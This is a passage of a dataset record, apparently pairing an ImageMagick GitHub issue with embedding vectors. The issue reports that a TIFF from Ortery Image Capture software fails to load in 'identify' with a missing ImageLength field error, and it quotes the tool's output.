0.01826639659702778, 0.01699669472873211, 0.0015221997164189816, 0.00021653922158293426, 0.0050319163128733635, -0.011470604687929153, 0.0025556362234055996, 0.003156219841912389, 0.006301618181169033, -0.003722535911947489, 0.008289135061204433, -0.005886801052838564, 0.0014771108981221914, -0.009486694820225239, -0.0035097163636237383, 0.0043393513187766075, -0.0009112457628361881, -0.0022941208444535732, -0.0031472020782530308, 0.009710336104035378, 0.014291362836956978, -0.0010217134840786457, -0.01817982643842697, -0.0033329681027680635, -0.009594907984137535, -0.016809124499559402, 0.00024212714924942702, -0.014334648847579956, 0.00934241060167551, -0.010511113330721855, -0.015193140134215355, -0.013209231197834015, -0.0033672356512397528, -0.012054956518113613, -0.015813563019037247, 0.030819132924079895, -0.0050283088348805904, -0.0017765008378773928, 0.006608222611248493, 0.007387357763946056, 0.007899567484855652, 0.02138293907046318, 0.017530547454953194, -0.0018179826438426971, -0.0008859959780238569, 0.01944952830672264, -0.00816649291664362, 0.0012949518859386444, -0.003466431051492691, 0.00039926180033944547, 0.0041481745429337025, -0.010568827390670776, -0.005233914125710726, 0.010301901027560234, 0.00683547044172883, -0.02325863391160965, -0.0026548318564891815, -0.005269985180348158, -0.009075484238564968, 0.014536646194756031, -0.011824101209640503, 0.00524473562836647, 0.016159845516085625, -0.027139883488416672, -0.007935638539493084, 0.00003299940362921916, 0.0068282559514045715, -0.008317992091178894, -0.0066984002478420734, -0.006507223471999168, 0.0011668995721265674, -0.0014148883055895567, 0.012379596009850502, -0.010799682699143887, -0.0017548581818118691, -0.002662045881152153, 0.020748088136315346, 0.002580886008217931, -0.01771811582148075, -0.011751959100365639, -0.015481708571314812, 0.007340465672314167, 0.008137636817991734, 0.0019803023897111416, -0.0037477854639291763, -0.009551622904837132, -0.0021227833349257708, -0.01284851972013712, -0.010438971221446991, 0.001617788104340434, -0.0059661571867764, -0.0031309700571000576, -0.0029957033693790436, 0.006420652847737074, 0.015207569114863873, -0.0038271420635282993, 0.005774980410933495, 0.0003954292624257505, -0.014168721623718739, 0.009407338686287403, 0.01796340011060238, -0.0011019716039299965, -0.0018793034832924604, 0.014262506738305092, 0.004086853936314583, -0.0037802495062351227, -0.0023734772112220526, 0.006110441405326128, 0.0018260986544191837, -0.024153197184205055, -0.007124038878828287, -0.0017241977620869875, 0.0017629741923883557, 0.03231969103217125, -0.03379138931632042, 0.011665388010442257, -0.0014193971874192357, -0.011766387149691582, 0.004285244736820459, -0.0026764743961393833, -0.003982247784733772, -0.0038379633333534002, -0.012992803938686848, -0.0012787198647856712, -0.03226197883486748, 0.01649169996380806, 0.054366335272789, -0.020748088136315346, 0.012632093392312527, 0.021339653059840202, -0.013468942604959011, -0.01512099802494049, 0.005165379028767347, -0.027313023805618286, -0.007069932296872139, 0.025134330615401268, -0.013836867175996304, -0.01310823205858469, -0.003787463763728738, -0.01634741574525833, -0.011708674021065235, -0.013000018894672394, 0.01417593564838171, 0.004894846118986607, 0.007928424514830112, 0.01046061422675848, 0.013930652290582657, -0.0006858014967292547, 0.005677588749676943, 0.015914561226963997, 0.002662045881152153, 0.01532299630343914, 0.003805499291047454, -0.0027937053237110376, 0.007986137643456459, 0.00016446159861516207, 0.01359158381819725, 0.011340748518705368, 0.021541651338338852, -0.030761420726776123, 0.01582799106836319, 0.003895676927641034, -0.011925100348889828, 0.01613098941743374, 0.01285573374480009, 0.003109327284619212, -0.0014978516846895218, 0.004912881646305323, -0.012300239875912666, -0.007546070497483015, -0.034281957894563675, -0.0009441606234759092, 0.0112253213301301, -0.012538308277726173, -0.005172593519091606, 0.007033861242234707, 0.0027359917294234037, -0.0052808066830039024, 0.016679268330335617, 0.0044367434456944466, -0.000807541364338249, 0.013223659247159958, -0.0044042794033885, 0.0015221997164189816, 0.0035511981695890427, -0.016563842073082924, 0.008058279752731323, -0.038408488035202026, -0.016318557783961296, 0.012228096835315228, -0.0009162055212073028, -0.005601839162409306, -0.008469490334391594, 0.035407375544309616, 0.00012726329441647977, 0.013036089949309826, 0.010222544893622398, 0.0040543898940086365, -0.022970065474510193, 0.0027323844842612743, 0.017891258001327515, -0.0311077032238245, 0.023994484916329384, 0.016708126291632652, 0.007784139830619097, -0.0031309700571000576, -0.007950066588819027, 0.031194273382425308, 0.02376363053917885, 0.0012228097766637802, 0.004844346549361944, -0.028885724022984505, 0.009349624626338482, -0.0002946556487586349, 0.00589040806517005, 0.009068270213901997, 0.019218673929572105, 0.0002991645596921444, -0.016635984182357788, 0.0028658476658165455, -0.0044367434456944466, -0.00711321784183383, 0.009796906262636185, -0.002981275087222457, 0.013303015381097794, -0.0018847141182050109, 0.0023103528656065464, 0.01924753002822399, 0.002395119983702898, 0.00691121956333518, 0.009407338686287403, 0.01211266964673996, -0.008253064006567001, 0.0035638229455798864, -0.0179201140999794, 0.028525013476610184, 0.0004030943673569709, 0.01929081603884697, 0.019478384405374527, 0.0014726020162925124, -0.005883193574845791, -0.011362391524016857, -0.0077697113156318665, -0.005875979550182819, 0.030357424169778824, 0.016159845516085625, -0.01613098941743374, -0.00567398127168417, -0.007986137643456459, 0.009522765874862671, -0.001505065942183137, -0.01552499458193779, -0.000945964187849313, 0.019406242296099663, 0.016318557783961296, -0.012480595149099827, 0.006608222611248493, 0.0015961454482749104, 0.0012318275403231382, -0.0027504200115799904, 0.01929081603884697, 0.020675944164395332, -0.0009919548174366355, 0.0075388564728200436, 0.0060419063083827496, -0.01711212284862995, -0.0037982850335538387, 0.04357386752963066, -0.015308568254113197, 0.023244205862283707, -0.02438405156135559, 0.0016493502771481872, 0.009097127243876457, 0.020488375797867775, 0.005057165864855051, 0.00028135444154031575, 0.01512099802494049, 0.011845744214951992, 0.02748616598546505, -0.006016656756401062, -0.0009193617152050138, -0.01440679095685482, -0.007827425375580788, 0.023547204211354256, 0.007762497290968895, -0.000203350733499974, 0.027370737865567207, 0.009255840443074703, -0.011160393245518208, 0.008765273727476597, 0.014428433030843735, 0.015077712945640087, -0.002671063644811511, -0.005414269398897886, 0.02957828901708126, -0.012206454761326313, -0.006590187083929777, 0.0012164972722530365, -0.0011506675509735942, -0.002470869105309248, -0.0007448678952641785, 0.025163188576698303, 0.017342977225780487, 0.0016123774694278836, -0.015149855054914951, 0.008173707872629166, 0.0028965079691261053, 0.014074936509132385, 0.008786915801465511, -0.014414004981517792, -0.02250835672020912, 0.0015267085982486606, 0.015077712945640087, -0.010907895863056183, 0.006312439683824778, -0.005655945744365454, 0.0275871641933918, -0.020199807360768318, 0.01838182471692562, 0.008794129826128483, -0.022219788283109665, 0.017025550827383995, -0.006723649799823761, 0.02096451446413994, -0.01828082464635372, -0.0006686677224934101, 0.023301919922232628, 0.010453400202095509, 0.0003223853127565235, 0.019536098465323448 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-62 ### Operating system MacOS ### Operating system, version and so on 12.5.1 ### Description TIFF image produced by Ortery Image Capture software cannot be read by the `identify` command. The error returned is `TIFF directory is missing required "ImageLength" field`. ### Steps to Reproduce ```bash > identify test.tif test.tif TIFF 1834x2786 1834x2786+0+0 8-bit sRGB 14.6317MiB 0.020u 0:00.009 identify: ASCII value for tag "Artist" does not end in null byte. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/951. identify: ASCII value for tag "Copyright" does not end in null byte. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/951. identify: Unknown field with tag 40965 (0xa005) encountered. `TIFFReadCustomDirectory' @ warning/tiff.c/TIFFWarnings/951. identify: ASCII value for tag "CameraOwnerName" does not end in null byte. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/951. identify: ASCII value for tag "Copyright" does not end in null byte. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/951. identify: ASCII value for tag "Copyright" does not end in null byte. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/951. identify: TIFF directory is missing required "ImageLength" field. `MissingRequired' @ error/tiff.c/TIFFErrors/598. ``` ### Images [test.tif.zip](https://github.com/ImageMagick/ImageMagick/files/10925600/test.tif.zip)
TIFF directory is missing required "ImageLength" field
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6143/comments
1
2023-03-08T22:04:48
2023-03-09T00:21:02Z
https://github.com/ImageMagick/ImageMagick/issues/6143
1,616,015,029
6,143
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : TIFF directory is missing required "ImageLength" field Issue date: --- start body --- ### ImageMagick version 7.1.0-62 ### Operating system MacOS ### Operating system, version and so on 12.5.1 ### Description TIFF image produced by Ortery Image Capture software cannot be read by the `identify` command. The error returned is `TIFF directory is missing required "ImageLength" field`. ### Steps to Reproduce ```bash > identify test.tif test.tif TIFF 1834x2786 1834x2786+0+0 8-bit sRGB 14.6317MiB 0.020u 0:00.009 identify: ASCII value for tag "Artist" does not end in null byte. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/951. identify: ASCII value for tag "Copyright" does not end in null byte. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/951. identify: Unknown field with tag 40965 (0xa005) encountered. `TIFFReadCustomDirectory' @ warning/tiff.c/TIFFWarnings/951. identify: ASCII value for tag "CameraOwnerName" does not end in null byte. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/951. identify: ASCII value for tag "Copyright" does not end in null byte. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/951. identify: ASCII value for tag "Copyright" does not end in null byte. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/951. identify: TIFF directory is missing required "ImageLength" field. `MissingRequired' @ error/tiff.c/TIFFErrors/598. ``` ### Images [test.tif.zip](https://github.com/ImageMagick/ImageMagick/files/10925600/test.tif.zip) --- end body ---
1,589
[ -0.00008103858272079378, -0.006812912877649069, -0.002874197671189904, 0.04149175435304642, 0.025911405682563782, 0.030741872265934944, 0.010365958325564861, 0.041324224323034286, -0.006205614190548658, 0.022853972390294075, 0.0001976338098756969, -0.006771029904484749, 0.0067919716238975525, 0.018665704876184464, -0.03727556765079498, -0.004792074207216501, -0.008027509786188602, 0.006415027659386396, -0.02443155273795128, -0.005371451377868652, 0.02438966929912567, 0.015650155022740364, 0.00428948225453496, 0.03816906362771988, 0.0007647948223166168, 0.0026054505724459887, -0.0020976231899112463, 0.00607298593968153, 0.01429594773799181, -0.030406812205910683, 0.03269639611244202, 0.02277020551264286, -0.009311911650002003, 0.028815271332859993, 0.026092898100614548, 0.012648563832044601, 0.015133601613342762, 0.0721498653292656, -0.009158342145383358, 0.013514138758182526, -0.024878300726413727, -0.0553409568965435, 0.010589332319796085, 0.022407222539186478, -0.03934177756309509, -0.0439767949283123, -0.029457470402121544, 0.012557817623019218, -0.034092485904693604, 0.022141966968774796, -0.003076630411669612, -0.05324682220816612, -0.03802945464849472, -0.004244109615683556, 0.0188751183450222, -0.015859566628932953, 0.0686875656247139, 0.0540565550327301, 0.002657803939655423, 0.009423598647117615, -0.008139196783304214, 0.04922608658671379, 0.014121437445282936, 0.03238925710320473, 0.003298259573057294, -0.019433554261922836, -0.033478207886219025, 0.029289940372109413, -0.008927986957132816, 0.009004771709442139, -0.003380279755219817, -0.03303145989775658, 0.013409432023763657, 0.034623000770807266, 0.017911817878484726, -0.029932141304016113, 0.039202168583869934, 0.010603293776512146, -0.011447926983237267, -0.003059179289266467, -0.038587890565395355, 0.018763432279229164, -0.04986828938126564, 0.04076578840613365, 0.010331056080758572, 0.017911817878484726, -0.04124046117067337, -0.06500189006328583, -0.051041003316640854, 0.01558034960180521, 0.008404454216361046, 0.03931385651230812, -0.0011430475860834122, -0.003968382254242897, -0.02892695739865303, -0.005776316858828068, 0.01975465565919876, -0.005542472004890442, -0.04179889336228371, -0.06416423618793488, 0.01789785735309124, -0.027209768071770668, -0.0026333723217248917, -0.013995788991451263, -0.031886667013168335, -0.01664137654006481, -0.0003967945813201368, -0.013102292083203793, 0.02348221093416214, 0.08996395766735077, -0.021904630586504936, -0.012173892930150032, -0.028508130460977554, -0.02621854469180107, -0.022281575947999954, 0.02006179466843605, 0.00476066255941987, 0.009779601357877254, -0.020592307671904564, 0.00635918416082859, -0.046070925891399384, -0.027195807546377182, -0.00656510703265667, 0.01955920271575451, -0.017548834905028343, 0.026749059557914734, 0.015552427619695663, -0.027223728597164154, -0.0000854558966238983, -0.01313021406531334, -0.03269639611244202, -0.05992012470960617, 0.044646915048360825, 0.010554430074989796, -0.05006374046206474, -0.004882819950580597, -0.02141600102186203, 0.023803312331438065, -0.025939328595995903, -0.005308627150952816, -0.0337015800178051, -0.0249062217772007, 0.03403664380311966, 0.022895853966474533, -0.01972673274576664, -0.009346813894808292, -0.010833648033440113, -0.022616636008024216, 0.021974435076117516, -0.013877121731638908, -0.02517147921025753, -0.009367754682898521, -0.026316272094845772, -0.0021464864257723093, 0.051990341395139694, -0.0022145456168800592, 0.018191035836935043, 0.0008625210612080991, -0.03054642118513584, -0.01444951817393303, -0.009926190599799156, -0.018344605341553688, 0.018554018810391426, 0.019196219742298126, 0.017130007967352867, -0.021025095134973526, -0.02595328912138939, 0.02621854469180107, -0.015608271583914757, 0.023733507841825485, 0.010680078528821468, -0.005511059891432524, -0.015859566628932953, -0.06371748447418213, -0.032528866082429886, -0.004505876451730728, 0.0026525685098022223, 0.03146784007549286, 0.024068569764494896, -0.018149152398109436, 0.00631730118766427, 0.01597125455737114, 0.0005366216064430773, -0.003598418552428484, 0.03116069920361042, -0.023398445919156075, 0.039565153419971466, 0.0020906426943838596, 0.010582352057099342, -0.018009543418884277, -0.008746495470404625, -0.007427191827446222, 0.005668119993060827, -0.02151372656226158, 0.04439562186598778, 0.01500795315951109, -0.014812501147389412, -0.052800074219703674, 0.011343220248818398, -0.010777805000543594, 0.02010367624461651, -0.012125030159950256, -0.016431963071227074, -0.0017459833761677146, -0.00952132511883974, 0.025562383234500885, -0.045456647872924805, 0.0006714314222335815, -0.011859773658216, -0.03548857569694519, -0.022658519446849823, -0.015161522664129734, 0.026958473026752472, 0.017199812456965446, -0.0044709742069244385, 0.020759839564561844, -0.0011308317771181464, 0.02182086557149887, -0.025520501658320427, 0.02479453571140766, 0.013514138758182526, -0.00950736366212368, 0.01429594773799181, -0.023593898862600327, -0.0338970348238945, -0.0061881630681455135, -0.003369809128344059, -0.011692242696881294, -0.017032282426953316, 0.024585122242569923, 0.013423392549157143, 0.006338242441415787, 0.004341835621744394, 0.007804135791957378, -0.004114971496164799, -0.001226812950335443, 0.012278599664568901, -0.044339776039123535, -0.012871937826275826, -0.015356975607573986, 0.02222573198378086, 0.005685571115463972, 0.001992916688323021, -0.017939738929271698, 0.019978029653429985, 0.003512908238917589, -0.03392495587468147, 0.00044892975711263716, -0.006219575181603432, 0.04794168472290039, 0.02713996358215809, -0.02364974282681942, 0.02859189547598362, -0.003947440534830093, 0.0059229061007499695, -0.004376737866550684, 0.01715792901813984, 0.012327463366091251, -0.0019178768852725625, -0.031411994248628616, 0.028480209410190582, 0.040989164263010025, -0.022211771458387375, 0.0013297745026648045, 0.053944867104291916, -0.0021290353033691645, -0.02317507192492485, 0.010303134098649025, 0.004907251801341772, -0.026776980608701706, 0.04154760017991066, -0.020815681666135788, 0.03501390293240547, 0.015119640156626701, -0.04710403084754944, -0.00278694205917418, -0.026106858626008034, -0.005730944219976664, 0.022965658456087112, 0.00011375941539881751, 0.007116562221199274, 0.018344605341553688, -0.03911840543150902, 0.00922116544097662, -0.016194628551602364, 0.007046757731586695, 0.033338598906993866, -0.0005968278856016695, -0.028954878449440002, -0.001609864761121571, -0.016334237530827522, 0.02547861821949482, -0.03037888929247856, -0.0034518293105065823, 0.017409225925803185, -0.03453923389315605, 0.01114776823669672, -0.007608683314174414, -0.018246879801154137, -0.008125236257910728, -0.01573392003774643, -0.009325872175395489, -0.017451109364628792, 0.019210180267691612, 0.01796766184270382, 0.030406812205910683, -0.016459885984659195, -0.009158342145383358, -0.0157618410885334, -0.004882819950580597, -0.004006774630397558, 0.001977210631594062, 0.04040280729532242, -0.004383718594908714, -0.01486834418028593, -0.0017625619657337666, 0.025017909705638885, -0.038783345371484756, 0.011280396953225136, -0.06405255198478699, -0.0051376065239310265, -0.00571698322892189, -0.015147562138736248, 0.014281987212598324, 0.02074587717652321, -0.002498998772352934, -0.00827182549983263, 0.029457470402121544, -0.017855973914265633, -0.018079347908496857, -0.002886413363739848, 0.0019039158942177892, 0.005085253156721592, -0.012306521646678448, 0.0536656491458416, -0.031551603227853775, -0.013583943247795105, -0.02182086557149887, -0.005371451377868652, 0.017576755955815315, -0.0022895855363458395, 0.0059159258380532265, 0.003776419907808304, -0.019810497760772705, 0.0448702909052372, -0.02956915833055973, 0.0090187331661582, 0.02253287099301815, 0.02222573198378086, -0.0027921772561967373, 0.0008219472365453839, 0.014714774675667286, -0.011336239986121655, 0.027768203988671303, 0.00002816718006215524, 0.020759839564561844, -0.015301131643354893, -0.03576779365539551, 0.01647384651005268, -0.021681256592273712, -0.034120406955480576, -0.011957499198615551, -0.0008503052522428334, 0.027279572561383247, -0.008495199494063854, 0.02405460737645626, 0.002638607518747449, -0.018693627789616585, -0.02585556171834469, -0.006519733928143978, -0.0033226909581571817, 0.01644592545926571, -0.050398800522089005, 0.006558126769959927, -0.03833659365773201, -0.027321456000208855, 0.012355384416878223, 0.017297537997364998, 0.011343220248818398, 0.011587535962462425, -0.022826049476861954, 0.0017067184671759605, 0.0386437363922596, -0.022546831518411636, -0.007776213809847832, -0.007992607541382313, -0.023440329357981682, -0.007957705296576023, -0.01634819805622101, -0.00214474112726748, -0.02084360457956791, 0.011601497419178486, -0.006512753665447235, -0.06544863432645798, -0.019573163241147995, 0.057909756898880005, -0.006463890429586172, -0.019363749772310257, 0.028508130460977554, -0.01827480085194111, -0.008195040747523308, -0.038727499544620514, 0.033310674130916595, 0.009067595936357975, -0.002942256862297654, 0.02422213926911354, 0.0068478151224553585, 0.013297745026648045, 0.041659288108348846, -0.010072779841721058, 0.013437354005873203, 0.044479385018348694, -0.023230915889143944, -0.004418620839715004, 0.014672892168164253, -0.0157618410885334, -0.0053540002554655075, -0.03116069920361042, -0.04710403084754944, 0.034595075994729996, -0.0005344402161426842, -0.0362703837454319, -0.03269639611244202, -0.027851969003677368, -0.0013795101549476385, 0.018833236768841743, -0.01086157001554966, 0.017953701317310333, 0.02378935180604458, -0.030462654307484627, -0.04216187819838524, 0.0006875736871734262, 0.006003181450068951, -0.013332647271454334, 0.0147008141502738, -0.01718585193157196, -0.0347905308008194, 0.007936764508485794, 0.007720370311290026, 0.029932141304016113, -0.02131827361881733, 0.04238525405526161, 0.024138374254107475, 0.00011703149357344955, -0.020285168662667274, 0.0013681668788194656, -0.022784167900681496, -0.03037888929247856, -0.015203406102955341, -0.029485393315553665, 0.011378122493624687, 0.06293568015098572, -0.008411434479057789, -0.02191859297454357, 0.007573781069368124, 0.010044857859611511, -0.015817685052752495, -0.009290969930589199, -0.00465246569365263, -0.02046665921807289, 0.0037938710302114487, -0.03130031004548073, -0.022183848544955254, 0.011280396953225136, 0.04199434816837311, 0.027991577982902527, 0.0028689622413367033, -0.011629418469965458, 0.024473434314131737, 0.04537288099527359, 0.002970178611576557, 0.02878734841942787, 0.01243217010051012, 0.02666529454290867, -0.006547655910253525, 0.008292767219245434, -0.023063385859131813, 0.021709179505705833, -0.0017590717179700732, -0.03593532368540764, -0.004722270183265209, -0.028577934950590134, -0.04671312868595123, 0.037443097680807114, 0.04604300484061241, 0.011922596953809261, 0.0016116098267957568, -0.029764611274003983, -0.016822868958115578, 0.04255278408527374, -0.0030120613519102335, 0.04984036460518837, -0.02443155273795128, -0.01992218568921089, 0.006453420035541058, 0.024682847782969475, -0.014435556717216969, -0.019140375778079033, -0.0008088588947430253, 0.03437170386314392, -0.004443052224814892, 0.010386900044977665, 0.026804903522133827, 0.01551054511219263, 0.020424777641892433, -0.005280705634504557, -0.012864957563579082, 0.017576755955815315, -0.04266447201371193, -0.0033139653969556093, -0.0153430150821805, -0.035097669810056686, 0.004313914105296135, -0.04341835901141167, 0.024403629824519157, -0.002331468043848872, 0.019768616184592247, -0.010959296487271786, 0.020117638632655144, -0.011350201442837715, -0.02101113460958004, -0.004198736511170864, 0.004184775985777378, 0.039537232369184494, 0.01211106963455677, -0.00734342634677887, 0.020648151636123657, -0.010170506313443184, -0.00230878172442317, -0.006373144686222076, -0.01692059449851513, 0.003102807095274329, 0.03640999272465706, 0.006334752310067415, -0.014407635666429996, 0.0030015907250344753, -0.024920182302594185, -0.012732328847050667, 0.0031464349012821913, -0.0349859818816185, 0.018693627789616585, 0.015035875141620636, -0.036968428641557693, 0.005291176028549671, -0.009367754682898521, 0.01563619263470173, -0.016418002545833588, 0.025799719616770744, -0.011161728762090206, -0.034930139780044556, 0.01680890843272209, -0.0017817581538110971, 0.01299060508608818, 0.004875839687883854, 0.029178254306316376, 0.050231270492076874, 0.018763432279229164, 0.0011238513980060816, 0.02564614824950695, -0.003912538755685091, -0.013269823044538498, 0.00861386675387621, -0.01860986277461052, 0.036354150623083115, -0.004819996189326048, 0.006327772047370672, 0.005029409658163786, 0.03191458806395531, -0.049114398658275604, -0.030295124277472496, 0.02198839746415615, 0.0013341372832655907, -0.04154760017991066, -0.013604884035885334, 0.018288761377334595, 0.007025816477835178, 0.0054656872525811195, -0.007406250573694706, -0.019405633211135864, -0.009905248880386353, 0.026679255068302155, -0.0057623558677732944, -0.0030521987937390804, -0.005448236130177975, 0.012481032870709896, 0.000563234556466341, -0.0062928698025643826, -0.030630186200141907, -0.020899446681141853, -0.02466888725757599, 0.006690755020827055, 0.016599494963884354, 0.01050556730479002, 0.03610285371541977, 0.02452927827835083, -0.009570187889039516, 0.01606898009777069, 0.006104397587478161, 0.011580555699765682, -0.006921109743416309, -0.0042615607380867004, 0.025604266673326492, -0.002603705506771803, 0.015370936132967472, -0.010065799579024315, -0.007678487803786993, 0.0274750255048275, -0.004436071962118149, 0.014247084967792034, -0.02087152563035488, -0.035544417798519135, 0.01177600771188736, 0.019447514787316322, -0.005758865736424923, 0.029010722413659096, -0.021471843123435974, 0.03183082118630409, -0.0012032539816573262, -0.030295124277472496, -0.008453316986560822, 0.024180255830287933, -0.03054642118513584, 0.00476066255941987, -0.009982033632695675, -0.0007102601230144501, 0.011161728762090206, -0.04554041102528572, 0.015440740622580051, -0.006764049641788006, -0.0414079912006855, 0.009060615673661232, 0.03054642118513584, 0.019238101318478584, -0.010673098266124725, -0.015315093100070953, 0.025129595771431923, 0.020787760615348816, -0.038252830505371094, -0.0112175727263093, -0.027447102591395378, 0.0027066669426858425, 0.021806905046105385, 0.020662112161517143, 0.029820453375577927, -0.0268328245729208, -0.009549246169626713, 0.0112175727263093, 0.010240310803055763, 0.02134619653224945, 0.03127238526940346, -0.019838420674204826, 0.026735099032521248, -0.0003645100223366171, 0.015468662604689598, -0.024543238803744316, -0.009388696402311325, 0.01775824837386608, 0.054754599928855896, -0.013255861587822437, -0.02165333554148674, 0.006722167134284973, -0.010554430074989796, -0.005270234774798155, -0.007699429057538509, 0.030434733256697655, 0.0026194113306701183, -0.0033750443253666162, -0.026916589587926865, 0.0324171781539917, -0.016362158581614494, 0.0007503976812586188, -0.037443097680807114, 0.009674894623458385, 0.00401026476174593, 0.001759944250807166, 0.008767437189817429, 0.014051632955670357, -0.007039777003228664, -0.004450032487511635, 0.027363337576389313, 0.011601497419178486, -0.012711387127637863, 0.004282501991838217, 0.013360568322241306, -0.009786581620573997, -0.001210234360769391, 0.010812707245349884, -0.016697220504283905, 0.03291977196931839, -0.00471877958625555, 0.018651744350790977, 0.002659549005329609, -0.009402656927704811, 0.01021936908364296, 0.005552942864596844, -0.01668325997889042, 0.004959605168551207, 0.028982801362872124, 0.030574342235922813, -0.0061323195695877075, -0.02540881372988224, 0.04503782093524933, 0.03224964812397957, 0.00026918333605863154, -0.03869957849383354, 0.011336239986121655, 0.0001825822255341336, 0.003181337146088481, 0.015161522664129734, 0.015622232109308243, -0.013611864298582077, 0.003525123931467533, 0.0013009801041334867, -0.01840044930577278, -0.005060821305960417, 0.002799157751724124, -0.006415027659386396, -0.0002545680326875299, -0.05528511106967926, -0.01075686328113079, -0.0034884766209870577, -0.020801721140742302, -0.01313021406531334, -0.0527721531689167, 0.0034029660746455193, 0.016110863536596298, -0.003954421263188124, 0.02256079390645027, 0.01654365099966526, 0.020885486155748367, -0.026944512501358986, -0.006121848709881306, 0.038420360535383224, 0.0001239028642885387, 0.008320688270032406, 0.04213395714759827, 0.009940151125192642, -0.021360157057642937, 0.053442273288965225, -0.019196219742298126, 0.022881893441081047, -0.020662112161517143, -0.0192241407930851, -0.03802945464849472, -0.014086535200476646, -0.007852998562157154, 0.03065810725092888, 0.01827480085194111, -0.009465481154620647, -0.02621854469180107, 0.010903452523052692, -0.013814297504723072, 0.016055019572377205, -0.014672892168164253, 0.012173892930150032, 0.01664137654006481, 0.030434733256697655, -0.002888158429414034, 0.020731916651129723, -0.01150377094745636, 0.010142584331333637, -0.024236099794507027, 0.009158342145383358, 0.019070571288466454, 0.036996349692344666, 0.040039822459220886, 0.03328275308012962, -0.010987217538058758, 0.008990811184048653, -0.02459908276796341, -0.01671118102967739, 0.006418517790734768, -0.03238925710320473, -0.0013786376221105456, 0.016027098521590233, -0.015566389076411724, 0.007839038036763668, -0.030127594247460365, 0.023468250408768654, 0.0024134882260113955, -0.021639375016093254, 0.024878300726413727, -0.058244820684194565, 0.025729915127158165, 0.026874708011746407, 0.0035949284210801125, 0.012055225670337677, 0.0048479181714355946, -0.033338598906993866, 0.013898062519729137, -0.011350201442837715, -0.006823383271694183, 0.05589938908815384, -0.018093308433890343, 0.012732328847050667, -0.0019510339479893446, 0.01518944464623928, -0.01756279543042183, 0.013898062519729137, 0.015608271583914757, -0.01901472732424736, 0.02438966929912567, -0.014177280478179455, -0.023328641429543495, -0.03197043016552925, -0.007127032615244389, 0.00006675049371551722, 0.0313282310962677, -0.0313282310962677, 0.02771236002445221, 0.0255484227091074, 0.00911645870655775, 0.009891288354992867, 0.02053646370768547, 0.00954226590692997, -0.00046899853623472154, -0.0012844016309827566, -0.039062559604644775, 0.006498792674392462, -0.008837241679430008, -0.04710403084754944, -0.008264845237135887, -0.018889080733060837, -0.027656516060233116, -0.013681668788194656, -0.0347905308008194, -0.015175484120845795, -0.013549041002988815, 0.005626237485557795, -0.004823486320674419, -0.02628834918141365, -0.040514495223760605, 0.01437971368432045, -0.006128829438239336, -0.019210180267691612, 0.020592307671904564, -0.003336651949211955, 0.0012303031980991364, -0.03035096824169159, 0.03342236205935478, -0.01941959373652935, -0.01143396645784378, -0.020452698692679405, -0.019000766798853874, 0.01877739280462265, 0.0027468043845146894, -0.02263059839606285, 0.010044857859611511, -0.020662112161517143, 0.036047011613845825, 0.024654926732182503, 0.05654159188270569, -0.03445546701550484, -0.0035914380569010973, 0.012767231091856956, -0.014658930711448193, -0.027600673958659172, 0.01651572994887829, -0.01437971368432045, -0.01927998475730419, -0.0060660052113235, 0.03437170386314392, -0.011657340452075005, -0.005008467938750982, 0.04096124321222305, -0.01573392003774643, 0.01313021406531334, -0.006896677892655134, -0.006704716011881828, 0.024543238803744316, -0.018526095896959305, -0.010345017537474632, 0.036326225847005844, -0.030155515298247337, -0.022812088951468468, 0.007790174800902605, -0.028815271332859993, -0.004013754893094301, -0.026106858626008034, -0.01668325997889042, -0.019880302250385284, 0.037778161466121674, -0.0004982291720807552, 0.021862749010324478, -0.005814709234982729, -0.010735921561717987, -0.00923512689769268, -0.003282553516328335, 0.007748292293399572, -0.000030866649467498064, 0.028647739440202713, 0.004125441890209913, -0.013709590770304203, -0.012641582638025284, 0.0140586132183671, 0.028466248884797096, -0.008139196783304214, -0.026344193145632744, -0.0217929445207119, -0.01968485116958618, 0.003008571220561862, 0.01925206370651722, 0.010694039054214954, -0.007088640239089727, 0.004279011860489845, -0.026176663115620613, -0.0011125081218779087, 0.010512547567486763, -0.00730852410197258, 0.013444334268569946, 0.03247302398085594, -0.02127639204263687, -0.0028288247995078564, -0.020787760615348816, -0.028647739440202713, -0.02006179466843605, -0.017702404409646988, 0.006289379671216011, -0.02094133011996746, 0.03035096824169159, -0.0326126329600811, 0.011943538673222065, -0.0021569570526480675, 0.011091924272477627, 0.016264433041214943, -0.019363749772310257, -0.0338970348238945, -0.03361781686544418, -0.005671610124409199, -0.004739721305668354, 0.005654159002006054, 0.002743314253166318, 0.00478858407586813, 0.01627839356660843, -0.012913820333778858, -0.00734342634677887, -0.04020735248923302, 0.0015863057924434543, 0.005011958535760641, -0.021039055660367012, 0.023845193907618523, 0.005071292165666819, -0.0015234817983582616, -0.021806905046105385, -0.025995170697569847, 0.008062412030994892, 0.0036507719196379185, -0.015231327153742313, -0.026078935712575912, -0.02131827361881733, 0.007001384627074003, 0.0125019745901227, -0.02954123727977276, 0.0032232196535915136, 0.012411228381097317, 0.02263059839606285, -0.013758453540503979, -0.010610274039208889, 0.018260840326547623, -0.008188060484826565, 0.007434172090142965, 0.01941959373652935, -0.024180255830287933, -0.003846224397420883, -0.01901472732424736, 0.0375547856092453, -0.008153158240020275, -0.0013419901952147484, -0.005179489031434059, -0.02263059839606285, -0.008648768998682499, 0.015622232109308243, -0.027768203988671303, -0.0010837138397619128, 0.005469177383929491, 0.02060626819729805, 0.015594310127198696, -0.013946926221251488, -0.007748292293399572, -0.002964943414554, -0.012641582638025284, -0.01527321059256792, 0.025799719616770744, 0.006620950531214476, 0.04238525405526161, -0.005099213682115078, -0.01532905362546444, 0.012236717157065868, -0.017618639394640923, 0.003685674164444208, 0.011524711735546589, -0.022072162479162216, -0.004198736511170864, -0.04442354291677475, -0.027433142066001892, -0.01527321059256792, -0.007908842526376247, 